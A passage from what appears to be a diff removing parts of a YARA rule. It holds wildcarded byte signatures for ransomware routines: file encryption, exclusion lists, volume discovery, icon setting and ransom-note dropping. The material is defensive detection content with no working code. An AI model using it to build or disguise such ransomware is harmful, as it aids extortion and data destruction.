-            4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ??
-            8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
-        }
-		$exclude_from_encryption_v2_p1 = {
-            50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ??
-            ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ??
-            E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6
-        }
-		$exclude_from_encryption_v2_p2 = {
-            45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 FE ?? 74 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 50 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? B9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 84 C0 0F 44 CA 8D 45 ?? 50 E8 ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ??
-            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8
-        }
-		$encrypt_files_v5_p1 = {
-            50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 8D 45 ?? 50 56 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
-            8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C7 45 ?? ?? ?? ?? ?? 8D 4B ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B C2 ?? ?? 8B 7D ?? 83
-            C1 ?? 8B 35 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B 7D ??
-            6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ??
-            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ??
-            E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? B9 ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 6A ??
-            FF 75 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? FF 75 ?? 83
-        }
-		$encrypt_files_v5_p2 = {
-            C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C ?? 81 FF ?? ??
-            ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0 66 0F 13 45
-            ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CF 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2 50 51 E8 ??
-            ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89 45 ?? F2 0F
-            11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85 ?? ?? ?? ??
-            39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 FF 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ??
-            8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 85
-            C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F 11 45 ?? 50
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D
-            ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52 50 FF 75 ??
-            FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ?? ?? ?? 89 45
-            ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 FF 75 ?? 57
-            6A ?? 6A ?? 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 0F 57
-            C0 66 0F 13 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B
-            7D ?? 89 45 ?? 66 66 0F 1F 84 00 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 8B 45 ?? 8B CF 0F A4 C8 ?? 6A ?? C1 E1 ?? 03
-            4D ?? 6A ?? 13 45 ?? 50 51 56 C6 45 ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 03 7D ?? 8B 45 ??
-            13 45 ?? 89 45 ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 7D ?? 0F 82
-        }
-		$encrypt_files_v6_p1 = {
-            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 85 F6 0F 8F ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 03 48 ?? 8B 01 FF 50 ?? 83 7B ?? ?? 8D 43 ??
-            F2 0F 10 05 ?? ?? ?? ?? 0F 43 43 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ??
-            ?? ?? 50 F2 0F 11 45 ?? FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 74 ?? 8D 45 ?? 50 57 FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
-            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 85 C9 74 ?? 8B 01 6A ?? FF 10 C6 45 ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8D 4B ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 64 89 0D ?? ?? ?? ?? 5E 8B E5 5D 8B E3 5B
-            C2 ?? ?? 85 F6 0F 84 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 8B CF 76 ?? 8B FE 2B 7D ?? 66
-            8B 04 0F 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? 2B 75 ?? D1 FE E9 ?? ?? ?? ?? 8B 7D
-            ?? 83 C6 ?? 8B 15 ?? ?? ?? ?? 8B 45 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8D 8D ?? ?? ?? ?? 8B
-            75 ?? 6A ?? 89 45 ?? E8 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
-        }
-		$encrypt_files_v6_p2 = {
-            45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 03 C1 C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ??
-            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ??
-            6A ?? E8 ?? ?? ?? ?? 6A ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 89 45 ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 C4 ?? 89 45 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? FF 75 ?? E8 ?? ?? ??
-            ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? 6A ?? FF 75 ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 6A ??
-            FF 75 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 85 C0 0F 8F ?? ?? ?? ?? 7C
-        }
-		$encrypt_files_v6_p3 = {
-            81 FE ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? F2 0F 10 05 ?? ?? ?? ?? F2 0F 11 45 ?? 0F 57 C0
-            66 0F 13 45 ?? 8B 4D ?? 8B 55 ?? 89 4D ?? 8B CE 89 55 ?? 2B 4D ?? 6A ?? 6A ?? 1B C2
-            50 51 E8 ?? ?? ?? ?? F2 0F 10 45 ?? 8B CA F2 0F 59 05 ?? ?? ?? ?? 89 4D ?? 8B C8 89
-            45 ?? F2 0F 11 45 ?? E8 ?? ?? ?? ?? F2 0F 59 45 ?? E8 ?? ?? ?? ?? 8B C8 0B CA 0F 85
-            ?? ?? ?? ?? 39 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 85 F6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? E9 ??
-            ?? ?? ?? 85 C0 0F 8C ?? ?? ?? ?? 7F ?? 81 FE ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? F2 0F 10
-            05 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? F2 0F
-            11 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 57 C6 45
-            ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 D2 C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 52
-            50 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B C8 89 45 ?? 0B CA 89 55 ?? 75 ?? 8D 85 ?? ??
-            ?? ?? 89 45 ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 50
-            FF 75 ?? 56 6A ?? 6A ?? 57 C6 45 ?? ?? 8B 4D
-        }
-		$set_default_icon_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66
-            89 45 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? B0 ?? C7 45 ?? ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 98
-            66 31 44 4D ?? 41 83 F9 ?? 73 ?? 8A 45 ?? EB ?? 33 C0 56 66 89 45 ?? C6 45 ?? ?? 8D
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 8B F0 C7 45
-            ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? 83 C4 ?? C7 46 ?? ?? ?? ?? ?? 66 89 06 C7 45 ??
-            ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2
-        }
-		$set_default_icon_p2 = {
-            81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ??
-            51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 51 8D 4D ?? C7 45 ?? ??
-            ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 33 C0 83 7D ?? ?? 6A ?? 66 89 45 ?? 8D 45 ?? 0F 43
-            45 ?? 6A ?? 6A ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 83 7D ?? ?? 8D 4D
-            ?? 8B 45 ?? 0F 43 4D ?? 03 C0 50 51 6A ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF
-            75 ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF D6 6A
-            ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D6 B8 ?? ?? ?? ?? 89 45 ?? 83 E0 ?? 89 45
-            ?? C6 45 ?? ?? 8B 4D ?? 5E 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9
-            ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_system_volumes = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 81 EC ?? ??
-            ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 75 ?? C7 06 ?? ?? ?? ??
-            C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B F8 66 90
-            8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
-            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? F7 45 ?? ?? ?? ?? ?? 0F 85 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 D2 C7 45 ?? ?? ?? ?? ?? 66 89 55 ??
-            83 C4 ?? 8D 95 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 0C 00 C7 45 ?? ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 03 C1 C7 45 ?? ?? ?? ?? ?? 3B D0 74 ?? D1 F9 8B C2
-            51 50 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 8B 46 ?? 3B 46 ?? 74 ??
-            6A ?? 51 50 C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 83 46 ?? ?? 66 89 45 ??
-            EB ?? 51 50 8B CE E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C
-            4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8
-            ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 66 89 45 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF D3 85 C0 0F 85 ?? ?? ?? ??
-            57 FF 15 ?? ?? ?? ?? 8B 4D ?? 8B C6 5F 5E 5B 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$drop_ransom_note_v2_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC ?? 53
-            56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? B9 ?? ?? ?? ?? 8B D8 2B CF 83 C4 ?? 3B CB 0F 82 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
-            8D 0C 3B C7 45 ?? ?? ?? ?? ?? 0F 43 45 ?? BE ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C7 45 ??
-            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 89 45 ?? 3B CE 76 ?? 8B F1 83 CE ?? 81 FE
-            ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 3B F0 0F 42 F0 8D 46 ?? 50 8D
-            4D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 0C 3B 89 45 ?? 89 75 ?? 8D 34 3F 56 FF 75 ?? 89 4D
-            ?? 50 E8 ?? ?? ?? ?? 8B 7D ?? 8D 04 1B 50 68 ?? ?? ?? ?? 8D 0C 3E 51 E8 ?? ?? ?? ??
-            8B 45 ?? 33 C9 83 C4 ?? C7 45 ?? ?? ?? ?? ?? 66 89 0C 47 C6 45 ?? ?? B8 ?? ?? ?? ??
-            83 3D ?? ?? ?? ?? ?? 8D 4D ?? FF 35 ?? ?? ?? ?? 0F 43 05 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8B F0 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 56 50 C7 45 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 C7 46 ?? ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 83 C4 ?? 66
-        }
-		$drop_ransom_note_v2_p2 = {
-            89 06 BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B
-            4D ?? 83 F9 ?? 72 ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B
-            50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 6A ?? 66 89 45
-            ?? 8D 45 ?? 0F 43 45 ?? 6A ?? 68 ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
-            ?? 8B F8 83 FF ?? 74 ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ??
-            ?? 57 FF 15 ?? ?? ?? ?? 83 E6 ?? 89 75 ?? C6 45 ?? ?? 8B 4D ?? 5F 5E 5B 83 F9 ?? 72
-            ?? 8B 55 ?? 8D 0C 4D ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B
-            C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ??
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D
-            ?? 64 89 0D ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_v5 = {
-            50 FF 15 ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? F6 C3 ?? 74
-            ?? C6 45 ?? ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? 51 8B C8 E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 4D ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ??
